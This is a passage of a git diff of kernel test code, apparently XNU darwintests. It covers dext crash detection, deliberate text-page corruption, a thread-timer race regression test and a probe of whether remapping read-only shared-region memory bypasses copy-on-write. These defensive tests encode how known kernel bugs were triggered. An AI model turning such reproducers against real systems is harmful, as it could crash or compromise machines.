T_META_IGNORECRASHES("*test_intentionally_crashing_driver_56101852*")) -{ - T_SKIP("skipping test_dext_launch_56101852 due to 62657199"); - - CFStringRef path = NULL; - CFURLRef url = NULL; - uint64_t startTime = mach_absolute_time(); - uint64_t endTime = 0; - size_t endTimeSize = sizeof(uint64_t); - uint64_t elapsedTimeAbs = 0; - uint64_t elapsedTimeNs = 0; - mach_timebase_info_data_t timebaseInfo; - copyfile_state_t copyfileState; - - copyfileState = copyfile_state_alloc(); - copyfile_state_set(copyfileState, COPYFILE_STATE_STATUS_CB, (void *)&copyfileCallback); - T_ASSERT_POSIX_SUCCESS(copyfile(DEXT_NAME, DEXT_PATH, copyfileState, COPYFILE_RECURSIVE | COPYFILE_ALL), "copied dext " DEXT_NAME " to " DEXT_PATH); - T_ATEND(cleanup); - - /* set up timebaseInfo */ - T_ASSERT_MACH_SUCCESS(mach_timebase_info(&timebaseInfo), "set up mach_timebase_info"); - - /* Set the initial value of kern.driverkit_checkin_timed_out to startTime */ - T_ASSERT_POSIX_SUCCESS(sysctlbyname(SYSCTL_NAME, NULL, NULL, &startTime, sizeof(startTime)), "set sysctl " 
SYSCTL_NAME " to %llu", startTime); - - - /* Convert DEXT_PATH to a CFURL */ - path = CFSTR(DEXT_PATH); - url = CFURLCreateWithFileSystemPath(kCFAllocatorDefault, path, kCFURLPOSIXPathStyle, true); - T_ASSERT_NOTNULL(url, "created CFURL from CFString"); - - /* Ask kextd to load the dext */ - T_ASSERT_EQ(KextManagerLoadKextWithURL(url, NULL), kOSReturnSuccess, "Loaded dext %s with kextd", DEXT_PATH); - T_LOG("Will sleep for up to %d seconds", MAX_TIMEOUT_SECONDS); - - /* Wait for up to 120 seconds. Each loop iteration sleeps for 1 second and checks - * the value of the sysctl to check if it has changed. If the value changed, then - * the dext loaded earlier has crashed. If 120 seconds elapses and the value does - * not change, then the dext did not crash. - */ - for (int i = 0; i < MAX_TIMEOUT_SECONDS; i++) { - sleep(1); - T_ASSERT_POSIX_SUCCESS(sysctlbyname(SYSCTL_NAME, &endTime, &endTimeSize, NULL, 0), "using " SYSCTL_NAME " to check if dext has crashed"); - if (endTime != startTime) { - T_LOG("Detected dext crash"); - break; - } - T_LOG(" Slept for %d seconds", i + 1); - } - - T_LOG("startTime = %llu, endTime = %llu", startTime, endTime); - - T_ASSERT_GT(endTime, startTime, "dext has crashed"); - - /* Check how much time has elapsed and see if it is less than 120 seconds. If it - * is 120 seconds or greater, then the dext did not check in to the kernel but we - * were not able to stop waiting for the dext to check in after it crashed. 
- */ - elapsedTimeAbs = endTime - startTime; - elapsedTimeNs = elapsedTimeAbs * timebaseInfo.numer / timebaseInfo.denom; - T_LOG("elapsedTimeAbs = %llu, elapsedTimeNs = %llu", elapsedTimeAbs, elapsedTimeNs); - T_ASSERT_LT(elapsedTimeNs / NSEC_PER_SEC, (uint64_t)MAX_TIMEOUT_SECONDS, "elapsed time is less than %d seconds", MAX_TIMEOUT_SECONDS); - - copyfile_state_free(copyfileState); - CFRelease(url); -} diff --git a/tests/test_dext_launch_56101852.entitlements b/tests/test_dext_launch_56101852.entitlements deleted file mode 100644 index 842b583b2..000000000 --- a/tests/test_dext_launch_56101852.entitlements +++ /dev/null @@ -1,8 +0,0 @@ - - - - - com.apple.private.security.storage.SystemExtensionManagement - - - diff --git a/tests/test_utils.c b/tests/test_utils.c new file mode 100644 index 000000000..e5197d41a --- /dev/null +++ b/tests/test_utils.c @@ -0,0 +1,25 @@ +#include +#include +#include +#include + +#include "test_utils.h" + +bool +is_development_kernel() +{ + static dispatch_once_t is_development_once; + static bool is_development; + + dispatch_once(&is_development_once, ^{ + int dev; + size_t dev_size = sizeof(dev); + + T_QUIET; + T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.development", &dev, + &dev_size, NULL, 0), NULL); + is_development = (dev != 0); + }); + + return is_development; +} diff --git a/tests/test_utils.h b/tests/test_utils.h new file mode 100644 index 000000000..655e69994 --- /dev/null +++ b/tests/test_utils.h @@ -0,0 +1,8 @@ +#ifndef XNU_DARWINTEST_UTILS_H +#define XNU_DARWINTEST_UTILS_H + +#include + +/* Misc. utility functions for writing darwintests. 
*/ +bool is_development_kernel(void); +#endif /* !defined(XNU_DARWINTEST_UTILS_H) */ diff --git a/tests/text_corruption.c b/tests/text_corruption.c new file mode 100644 index 000000000..d2ebe0773 --- /dev/null +++ b/tests/text_corruption.c @@ -0,0 +1,80 @@ +#include +#include + +#include +#include + +T_GLOBAL_META(T_META_RUN_CONCURRENTLY(false)); + +/* + * No system(3c) on watchOS, so provide our own. + * returns -1 if fails to run + * returns 0 if process exits normally. + * returns +n if process exits due to signal N + */ +static int +my_system(const char *command) +{ + pid_t pid; + int status = 0; + int signal = 0; + int err; + const char *argv[] = { + "/bin/sh", + "-c", + command, + NULL + }; + + if (dt_launch_tool(&pid, (char **)(void *)argv, FALSE, NULL, NULL)) { + return -1; + } + + err = dt_waitpid(pid, &status, &signal, 30); + if (err) { + return 0; + } + + return signal; +} + + +/* + * The tests are run in the following order: + * + * - call foo + * - corrupt foo, then call foo + * - call foo + * + * - call atan + * - corrupt atan, then call atan + * - call atan + * + * The first and last of each should exit normally. The middle one should exit with SIGILL. + * + * atan() was picked as a shared region function that isn't likely used by any normal daemons. 
+ */ +T_DECL(text_corruption_recovery, "test detection/recovery of text corruption", + T_META_IGNORECRASHES(".*text_corruption_helper.*"), + T_META_ASROOT(true)) +{ + int ret; + + ret = my_system("./text_corruption_helper foo"); + T_QUIET; T_ASSERT_EQ(ret, 0, "First call of foo"); + + ret = my_system("./text_corruption_helper Xfoo"); + T_QUIET; T_ASSERT_EQ(ret, SIGILL, "Call of corrupted foo"); + + ret = my_system("./text_corruption_helper foo"); + T_QUIET; T_ASSERT_EQ(ret, 0, "Fixed call of foo"); + + ret = my_system("./text_corruption_helper atan"); + T_QUIET; T_ASSERT_EQ(ret, 0, "First call of atan"); + + ret = my_system("./text_corruption_helper Xatan"); + T_QUIET; T_ASSERT_EQ(ret, SIGILL, "Call of corrupted atan"); + + ret = my_system("./text_corruption_helper atan"); + T_QUIET; T_ASSERT_EQ(ret, 0, "Fixed call of atan"); +} diff --git a/tests/text_corruption_helper.c b/tests/text_corruption_helper.c new file mode 100644 index 000000000..576836a99 --- /dev/null +++ b/tests/text_corruption_helper.c @@ -0,0 +1,56 @@ +#include +#include +#include +#include +#include +#include +#include + +__attribute__((noinline)) +static void +foo(void) +{ + printf("In foo()\n"); + fflush(stdout); +} + +/* + * volatile to stop the compiler from optimizing away calls to atan() + */ +volatile double zero = 0.0; + +int +main(int argc, char **argv) +{ + void *addr; + size_t s = sizeof(addr); + int err; + int a; + + /* + * needs to run as root for sysctl. 
+ */ + if (geteuid() != 0) { + printf("Test not running as root\n"); + exit(-1); + } + + if (strcmp(argv[argc - 1], "foo") == 0) { + foo(); + } else if (strcmp(argv[argc - 1], "Xfoo") == 0) { + printf("Warm up call to foo()\n"); + foo(); + addr = ptrauth_strip(&foo, ptrauth_key_function_pointer); + err = sysctlbyname("vm.corrupt_text_addr", NULL, NULL, &addr, s); + foo(); + } else if (strcmp(argv[argc - 1], "atan") == 0) { + printf("atan(0) is %g\n", atan(zero)); + } else if (strcmp(argv[argc - 1], "Xatan") == 0) { + printf("Warmup call to atan(0) is %g\n", atan(zero)); + addr = ptrauth_strip(&atan, ptrauth_key_function_pointer); + err = sysctlbyname("vm.corrupt_text_addr", NULL, NULL, &addr, s); + printf("atan(0) is %g\n", atan(zero)); + } else { + exit(-1); + } +} diff --git a/tests/thread_call_race_71455282.c b/tests/thread_call_race_71455282.c new file mode 100644 index 000000000..df5d8c8f3 --- /dev/null +++ b/tests/thread_call_race_71455282.c @@ -0,0 +1,52 @@ +#include +#include +#include +#include + +#include +#include +#include +#include + +#define die(w) errx(1, (w)) +#define edie(w) err(1, (w)) +#define expect(e) if (-1 == (e)) edie(#e) + +static void * +racer(void *data) +{ + for (;;) { + mk_timer_destroy(*(mach_port_t *)data); + } + + return NULL; +} + +T_DECL(thread_call_race_71455282, + "rdar://71455282", + T_META_IGNORECRASHES(".*thread_call_race_71455282.*")) +{ + mach_port_t timer = MACH_PORT_NULL; + pthread_t t; + size_t n; + + /* we will violate mach rules so ignore crashes here */ + T_ASSERT_MACH_SUCCESS(task_set_exc_guard_behavior(mach_task_self(), 0), + "task_set_exc_guard_behavior"); + + for (n = 0; n < 4; ++n) { + T_ASSERT_POSIX_SUCCESS(pthread_create(&t, NULL, racer, &timer), + "pthread_create"); + } + + T_LOG("racing"); + for (size_t i = 0; i < 1000; i++) { + timer = mk_timer_create(); + mk_timer_arm(timer, 1); + mk_timer_destroy(timer); + timer = MACH_PORT_NULL; + } + + T_PASS("didn't panic"); + T_END; +} diff --git 
a/tests/trial_experiments.c b/tests/trial_experiments.c new file mode 100644 index 000000000..fd197cd91 --- /dev/null +++ b/tests/trial_experiments.c @@ -0,0 +1,83 @@ +#include +#include +#include + +#include + +#include "drop_priv.h" +#include "test_utils.h" + +#if ENTITLED +#define SET_TREATMENT_ID set_treatment_id_entitled +#define SET_TREATMENT_ID_DESCR "Can set treatment id with entitlement" +#else /* ENTITLED */ +#define SET_TREATMENT_ID set_treatment_id_unentitled +#define SET_TREATMENT_ID_DESCR "Can't set treatment id without entitlement" +#endif /* ENTITLED */ + +T_DECL(SET_TREATMENT_ID, "Verifies that EXPERIMENT sysctls can only be set with the entitlement", T_META_ASROOT(false)) +{ +#define TEST_STR "testing" +#define IDENTIFIER_LENGTH 36 + + int ret; + errno_t err; + char val[IDENTIFIER_LENGTH + 1] = {0}; + size_t len = sizeof(val); + char new_val[IDENTIFIER_LENGTH + 1] = {0}; + + if (!is_development_kernel()) { + T_SKIP("skipping test on release kernel"); + } + + strlcpy(new_val, TEST_STR, sizeof(new_val)); + drop_priv(); + + ret = sysctlbyname("kern.trial_treatment_id", val, &len, new_val, strlen(new_val)); + err = errno; +#if ENTITLED + len = sizeof(val); + memset(new_val, 0, sizeof(new_val)); + T_ASSERT_POSIX_SUCCESS(ret, "set kern.trial_treatment_id"); + /* Cleanup. Set it back to the empty string. */ + ret = sysctlbyname("kern.trial_treatment_id", val, &len, new_val, 1); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "reset kern.trial_treatment_id"); +#else + T_ASSERT_POSIX_FAILURE(ret, EPERM, "set kern.trial_treatment_id"); +#endif /* ENTITLED */ +} + +#if ENTITLED +/* Check min and max value limits on numeric factors */ +T_DECL(experiment_factor_numeric_limits, + "Can only set factors within the legal range.", + T_META_ASROOT(false)) +{ +#define kMinVal 5 /* The min value allowed for the testing factor. */ +#define kMaxVal 10 /* The max value allowed for the testing factor. 
*/ + errno_t err; + int ret; + unsigned int current_val; + size_t len = sizeof(current_val); + unsigned int new_val; + + drop_priv(); + new_val = kMinVal - 1; + ret = sysctlbyname("kern.testing_experiment_factor", &current_val, &len, &new_val, sizeof(new_val)); + err = errno; + T_ASSERT_POSIX_FAILURE(ret, EINVAL, "set kern.testing_experiment_factor below range."); + + new_val = kMaxVal + 1; + ret = sysctlbyname("kern.testing_experiment_factor", &current_val, &len, &new_val, sizeof(new_val)); + err = errno; + T_ASSERT_POSIX_FAILURE(ret, EINVAL, "set kern.testing_experiment_factor above range."); + + new_val = kMaxVal; + ret = sysctlbyname("kern.testing_experiment_factor", &current_val, &len, &new_val, sizeof(new_val)); + T_ASSERT_POSIX_SUCCESS(ret, "set kern.testing_experiment_factor at top of range."); + + new_val = kMinVal; + ret = sysctlbyname("kern.testing_experiment_factor", &current_val, &len, &new_val, sizeof(new_val)); + T_ASSERT_POSIX_SUCCESS(ret, "set kern.testing_experiment_factor at bottom of range."); +} +#endif /* ENTITLED */ diff --git a/tests/trial_experiments.entitlements b/tests/trial_experiments.entitlements new file mode 100644 index 000000000..4d1bd47e0 --- /dev/null +++ b/tests/trial_experiments.entitlements @@ -0,0 +1,8 @@ + + + + + com.apple.private.write-kr-experiment-factors + + + diff --git a/tests/vm/fault_throughput.c b/tests/vm/fault_throughput.c index 3cf9ef1b2..fbfcb3951 100644 --- a/tests/vm/fault_throughput.c +++ b/tests/vm/fault_throughput.c @@ -42,7 +42,7 @@ #include #include -#include "vm/perf_helpers.h" +#include "benchmark/helpers.h" #if (TARGET_OS_OSX || TARGET_OS_SIMULATOR) /* @@ -121,10 +121,6 @@ typedef struct test_args { bool verbose; } test_args_t; -/* Get a (wall-time) timestamp in nanoseconds */ -static uint64_t get_timestamp_ns(void); -/* Get the number of cpus on this device. */ -static unsigned int get_ncpu(void); /* * Fault in the pages in the given buffer. 
*/ @@ -197,7 +193,7 @@ main(int argc, char **argv) #else static const size_t memory_per_core = 25 * (1UL << 20); #endif /* (TARGET_OS_OSX || TARGET_OS_SIMULATOR) */ - const size_t kMemSize = memory_per_core * get_ncpu(); + const size_t kMemSize = memory_per_core * (size_t) get_ncpu(); test_globals_t *globals = allocate_test_globals(); /* Total wall-time spent faulting in pages. */ uint64_t wall_time_elapsed_ns = 0; @@ -368,7 +364,7 @@ start_iteration(test_globals_t* globals, test_variant_t variant, bool verbose) setup_memory(globals, variant); benchmark_log(verbose, "Initialized data structures for iteration. Waking workers.\n"); /* Grab a timestamp, tick the current iteration, and wake up the worker threads */ - start_time = get_timestamp_ns(); + start_time = current_timestamp_ns(); globals->tg_current_iteration++; ret = pthread_mutex_unlock(&globals->tg_lock); assert(ret == 0); @@ -387,7 +383,7 @@ finish_iteration(test_globals_t* globals, uint64_t start_time) while (globals->tg_iterations_completed != globals->tg_current_iteration) { ret = pthread_cond_wait(&globals->tg_cv, &globals->tg_lock); } - end_time = get_timestamp_ns(); + end_time = current_timestamp_ns(); ret = pthread_mutex_unlock(&globals->tg_lock); unmap_fault_buffers(globals); assert(ret == 0); @@ -602,22 +598,6 @@ print_help(char** argv) fprintf(stderr, " %s Share vm objects across faulting threads.\n", kShareObjectsArgument); } -static uint64_t -get_timestamp_ns() -{ - return clock_gettime_nsec_np(kWallTimeClock); -} - -static unsigned int -get_ncpu(void) -{ - int ncpu; - size_t sysctl_size = sizeof(ncpu); - int ret = sysctlbyname("hw.ncpu", &ncpu, &sysctl_size, NULL, 0); - assert(ret == 0); - return (unsigned int) ncpu; -} - static void parse_arguments(int argc, char** argv, test_args_t *args) { diff --git a/tests/vm/page_size_globals.c b/tests/vm/page_size_globals.c new file mode 100644 index 000000000..3e563ce8d --- /dev/null +++ b/tests/vm/page_size_globals.c @@ -0,0 +1,43 @@ +#include 
+#include + +T_GLOBAL_META( + T_META_NAMESPACE("vm_page_size_overrides") + ); + +static void +verify_page_size( + int expected_shift, + int page_shift, + vm_size_t page_size, + vm_size_t page_mask) +{ + T_ASSERT_EQ(page_shift, expected_shift, "page_shift"); + T_ASSERT_EQ(page_size, 1UL << expected_shift, "page_size"); + T_ASSERT_EQ(page_mask, page_size - 1, "page_mask"); +} + + +T_DECL(kernel_4k, + "Can override vm_kernel_page_size", + T_META_ENVVAR("VM_KERNEL_PAGE_SIZE_4K=1"), + T_META_ENVVAR("MallocGuardEdges=0"), + T_META_ENVVAR("MallocDoNotProtectPrelude=1"), + T_META_ENVVAR("MallocDoNotProtectPostlude=1")) +{ + verify_page_size(12, vm_kernel_page_shift, vm_kernel_page_size, vm_kernel_page_mask); +} + +T_DECL(invalid, + "Invalid overrides", + T_META_ENVVAR("VM_KERNEL_PAGE_SIZE_4K=2"), + T_META_ENVVAR("VM_KERNEL_PAGE_SIZE=4K"), + T_META_ENVVAR("VM_KERNEL_PAGE_SIZE=")) +{ + /* + * This test just verifies that libkernel_init doesn't + * crash when handling invalid overrides. + * So if we got here, we can pass the test. + */ + T_PASS("Test process spawned"); +} diff --git a/tests/vm/perf_helpers.c b/tests/vm/perf_helpers.c deleted file mode 100644 index b4dea3102..000000000 --- a/tests/vm/perf_helpers.c +++ /dev/null @@ -1,69 +0,0 @@ -#include -#include -#include -#include -#include -#include - -#include - -#include "vm/perf_helpers.h" - -#define K_CTIME_BUFFER_LEN 26 -void -benchmark_log(bool verbose, const char *restrict fmt, ...) 
-{ - time_t now; - char time_buffer[K_CTIME_BUFFER_LEN]; - struct tm local_time; - va_list args; - if (verbose) { - strncpy(time_buffer, "UNKNOWN", K_CTIME_BUFFER_LEN); - - now = time(NULL); - if (now != -1) { - struct tm* ret = localtime_r(&now, &local_time); - if (ret == &local_time) { - snprintf(time_buffer, K_CTIME_BUFFER_LEN, - "%.2d/%.2d/%.2d %.2d:%.2d:%.2d", - local_time.tm_mon + 1, local_time.tm_mday, - local_time.tm_year + 1900, - local_time.tm_hour, local_time.tm_min, - local_time.tm_sec); - } - } - - printf("%s: ", time_buffer); - va_start(args, fmt); - vprintf(fmt, args); - fflush(stdout); - } -} - -uint64_t -timespec_difference_us(const struct timespec* a, const struct timespec* b) -{ - assert(a->tv_sec >= b->tv_sec || a->tv_nsec >= b->tv_nsec); - long seconds_elapsed = a->tv_sec - b->tv_sec; - uint64_t nsec_elapsed; - if (b->tv_nsec > a->tv_nsec) { - seconds_elapsed--; - nsec_elapsed = kNumNanosecondsInSecond - (uint64_t) (b->tv_nsec - a->tv_nsec); - } else { - nsec_elapsed = (uint64_t) (a->tv_nsec - b->tv_nsec); - } - return (uint64_t) seconds_elapsed * kNumMicrosecondsInSecond + nsec_elapsed / kNumNanosecondsInMicrosecond; -} - -unsigned char * -mmap_buffer(size_t memsize) -{ - int fd = -1; - unsigned char* addr = (unsigned char *)mmap(NULL, memsize, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, - fd, 0); - if ((void*) addr == MAP_FAILED) { - fprintf(stderr, "Unable to mmap a memory object: %s\n", strerror(errno)); - exit(2); - } - return addr; -} diff --git a/tests/vm/perf_helpers.h b/tests/vm/perf_helpers.h deleted file mode 100644 index 53633f542..000000000 --- a/tests/vm/perf_helpers.h +++ /dev/null @@ -1,34 +0,0 @@ -#ifndef VM_PERF_HELPERS_H -#define VM_PERF_HELPERS_H - -/* - * Utility functions and constants used by the VM perf tests. - */ -#include -#include -#include - -/* - * mmap an anonymous chunk of memory. - */ -unsigned char *mmap_buffer(size_t size); -/* - * Returns a - b in microseconds. 
- * NB: a must be >= b - */ -uint64_t timespec_difference_us(const struct timespec* a, const struct timespec* b); -/* - * Print the message to stdout along with the current time. - * Also flushes stdout so that the log can help detect hangs. Don't call - * this function from within the measured portion of the benchmark as it will - * pollute your measurement. - * - * NB: Will only log if verbose == true. - */ -void benchmark_log(bool verbose, const char *restrict fmt, ...) __attribute__((format(printf, 2, 3))); - -static const uint64_t kNumMicrosecondsInSecond = 1000UL * 1000; -static const uint64_t kNumNanosecondsInMicrosecond = 1000UL; -static const uint64_t kNumNanosecondsInSecond = kNumNanosecondsInMicrosecond * kNumMicrosecondsInSecond; - -#endif /* !defined(VM_PERF_HELPERS_H) */ diff --git a/tests/vm/perf_madvise.c b/tests/vm/perf_madvise.c index b579361b3..c8fd45487 100644 --- a/tests/vm/perf_madvise.c +++ b/tests/vm/perf_madvise.c @@ -12,7 +12,7 @@ #include #include -#include "vm/perf_helpers.h" +#include "benchmark/helpers.h" typedef enum test_variant { VARIANT_MADVISE_FREE diff --git a/tests/vm/retired_pages.c b/tests/vm/retired_pages.c new file mode 100644 index 000000000..95a5706cb --- /dev/null +++ b/tests/vm/retired_pages.c @@ -0,0 +1,46 @@ +#include +#include + +#include + +/* + * trying phys offsets from start of dram of: + * watchOS 512Meg + * macOS 3Gig + * iOS,etc. 
750Meg + */ +#if TARGET_OS_WATCH +#define USEBOOTARG "bad_ram_pages=536870912 bad_static_mfree=1" +#elif TARGET_OS_OSX +#define USEBOOTARG "bad_ram_pages=3221225472 bad_static_mfree=1" +#else +#define USEBOOTARG "bad_ram_pages=786432000 bad_static_mfree=1" +#endif + +T_DECL(retired_pages_test, + "Test retiring pages at boot", + T_META_NAMESPACE("xnu.vm"), + T_META_BOOTARGS_SET(USEBOOTARG), + T_META_ASROOT(true), + T_META_CHECK_LEAKS(false)) +{ + int err; + unsigned int count = 0; + size_t s = sizeof(count); + +#if !defined(__arm64__) || TARGET_OS_BRIDGE + T_SKIP("No page retirement on x86, arm32 or bridgeOS kernels"); +#endif + /* + * Get the number of pages retired from the kernel + */ + err = sysctlbyname("vm.retired_pages_count", &count, &s, NULL, 0); + + /* If the sysctl isn't supported, test succeeds */ + if (err == ENOENT) { + T_SKIP("sysctl vm.retired_pages_count not found, skipping test"); + } + T_ASSERT_POSIX_SUCCESS(err, "sysctl vm.retired_pages_count"); + + T_ASSERT_GT_INT(count, 0, "Expect retired pages"); +} diff --git a/tests/vm_test_code_signing_helper.c b/tests/vm_test_code_signing_helper.c index 0c429d725..7c799c775 100644 --- a/tests/vm_test_code_signing_helper.c +++ b/tests/vm_test_code_signing_helper.c @@ -1,3 +1,4 @@ +#include #include #include #include @@ -140,13 +141,13 @@ main( fprintf(stdout, "%s: WARNING: unsigned code was executed\n", cmdname); -#if CONFIG_EMBEDDED +#if !TARGET_OS_OSX /* fail: unsigned code was executed */ fprintf(stdout, "%s: FAIL\n", cmdname); exit(1); -#else /* CONFIG_EMBEDDED */ +#else /* !TARGET_OS_OSX */ /* no fail: unsigned code is only prohibited on embedded platforms */ fprintf(stdout, "%s: SUCCESS\n", cmdname); exit(0); -#endif /* CONFIG_EMBEDDED */ +#endif /* !TARGET_OS_OSX */ } diff --git a/tests/vm_test_mach_map.c b/tests/vm_test_mach_map.c index 2ab86744f..6fd927b77 100644 --- a/tests/vm_test_mach_map.c +++ b/tests/vm_test_mach_map.c @@ -7,6 +7,7 @@ */ #include +#include #include #include #include @@ -623,7 
+624,7 @@ T_DECL(madvise_shared, "test madvise shared for rdar://problem/2295713 logging \ } #if defined(__x86_64__) || defined(__i386__) - if (*((uint64_t *)_COMM_PAGE_CPU_CAPABILITIES64) & kIsTranslated) { + if (COMM_PAGE_READ(uint64_t, CPU_CAPABILITIES64) & kIsTranslated) { T_LOG("Skipping madvise reusable tests because we're running under translation."); goto done; } @@ -672,7 +673,7 @@ T_DECL(madvise_purgeable_can_reuse, "test madvise purgeable can reuse for \ T_META_ALL_VALID_ARCHS(true)) { #if defined(__x86_64__) || defined(__i386__) - if (*((uint64_t *)_COMM_PAGE_CPU_CAPABILITIES64) & kIsTranslated) { + if (COMM_PAGE_READ(uint64_t, CPU_CAPABILITIES64) & kIsTranslated) { T_SKIP("madvise reusable is not supported under Rosetta translation. Skipping.)"); } #endif /* defined(__x86_64__) || defined(__i386__) */ @@ -951,6 +952,677 @@ T_DECL(nested_pmap_trigger, "nested pmap should only be triggered from kernel \ T_ASSERT_MACH_SUCCESS(kr, "vm_map()"); } +static const char *prot_str[] = { "---", "r--", "-w-", "rw-", "--x", "r-x", "-wx", "rwx" }; +static const char *share_mode_str[] = { "---", "COW", "PRIVATE", "EMPTY", "SHARED", "TRUESHARED", "PRIVATE_ALIASED", "SHARED_ALIASED", "LARGE_PAGE" }; + +T_DECL(shared_region_share_writable, "sharing a writable mapping of the shared region shoudl not give write access to shared region - rdar://problem/74469953", + T_META_ALL_VALID_ARCHS(true)) +{ + int ret; + uint64_t sr_start; + kern_return_t kr; + mach_vm_address_t address, tmp_address, remap_address; + mach_vm_size_t size, tmp_size, remap_size; + uint32_t depth; + mach_msg_type_number_t count; + vm_region_submap_info_data_64_t info; + vm_prot_t cur_prot, max_prot; + uint32_t before, after, remap; + mach_port_t mem_entry; + + ret = __shared_region_check_np(&sr_start); + if (ret != 0) { + int saved_errno; + saved_errno = errno; + + T_ASSERT_EQ(saved_errno, ENOMEM, "__shared_region_check_np() %d (%s)", + saved_errno, strerror(saved_errno)); + T_END; + } + 
T_LOG("SHARED_REGION_BASE 0x%llx", SHARED_REGION_BASE); + T_LOG("SHARED_REGION_SIZE 0x%llx", SHARED_REGION_SIZE); + T_LOG("shared region starts at 0x%llx", sr_start); + T_QUIET; T_ASSERT_GE(sr_start, SHARED_REGION_BASE, + "shared region starts below BASE"); + T_QUIET; T_ASSERT_LT(sr_start, SHARED_REGION_BASE + SHARED_REGION_SIZE, + "shared region starts above BASE+SIZE"); + + /* + * Step 1 - check that one can not get write access to a read-only + * mapping in the shared region. + */ + size = 0; + for (address = SHARED_REGION_BASE; + address < SHARED_REGION_BASE + SHARED_REGION_SIZE; + address += size) { + size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &address, + &size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_region_recurse()"); + if (kr == KERN_INVALID_ADDRESS) { + T_SKIP("could not find read-only nested mapping"); + T_END; + } + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + address, address + size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + if (depth > 0 && + (info.protection == VM_PROT_READ) && + (info.max_protection == VM_PROT_READ)) { + /* nested and read-only: bingo! 
*/ + break; + } + } + if (address >= SHARED_REGION_BASE + SHARED_REGION_SIZE) { + T_SKIP("could not find read-only nested mapping"); + T_END; + } + + /* test vm_remap() of RO */ + before = *(uint32_t *)(uintptr_t)address; + remap_address = 0; + remap_size = size; + kr = mach_vm_remap(mach_task_self(), + &remap_address, + remap_size, + 0, + VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, + mach_task_self(), + address, + FALSE, + &cur_prot, + &max_prot, + VM_INHERIT_DEFAULT); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap()"); +// T_QUIET; T_ASSERT_EQ(cur_prot, VM_PROT_READ, "cur_prot is read-only"); +// T_QUIET; T_ASSERT_EQ(max_prot, VM_PROT_READ, "max_prot is read-only"); + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only"); +// T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only"); + /* check that new mapping is read-only */ + tmp_address = remap_address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, 
tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, remap_address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "new cur_prot read-only"); +// T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "new max_prot read-only"); + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); +// this would crash if actually read-only: +// *(uint32_t *)(uintptr_t)remap_address = before + 1; + after = *(uint32_t *)(uintptr_t)address; + T_LOG("vm_remap(): 0x%llx 0x%x -> 0x%x", address, before, after); +// *(uint32_t *)(uintptr_t)remap_address = before; + if (before != after) { + T_FAIL("vm_remap() bypassed copy-on-write"); + } else { + T_PASS("vm_remap() did not bypass copy-on-write"); + } + /* cleanup */ + kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()"); + T_PASS("vm_remap() read-only"); + +#if defined(VM_MEMORY_ROSETTA) + if (dlsym(RTLD_DEFAULT, "mach_vm_remap_new") == NULL) { + T_PASS("vm_remap_new() is not present"); + goto skip_vm_remap_new_ro; + } + /* test vm_remap_new() of RO */ + before = *(uint32_t *)(uintptr_t)address; + remap_address = 0; + remap_size = size; + cur_prot = VM_PROT_READ | VM_PROT_WRITE; + max_prot = VM_PROT_READ | VM_PROT_WRITE; + kr = mach_vm_remap_new(mach_task_self(), + &remap_address, + remap_size, + 0, + VM_FLAGS_ANYWHERE, + mach_task_self(), + address, + FALSE, + &cur_prot, + &max_prot, + VM_INHERIT_DEFAULT); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_remap_new()"); + if (kr == KERN_PROTECTION_FAILURE) { + /* wrong but not a security issue... 
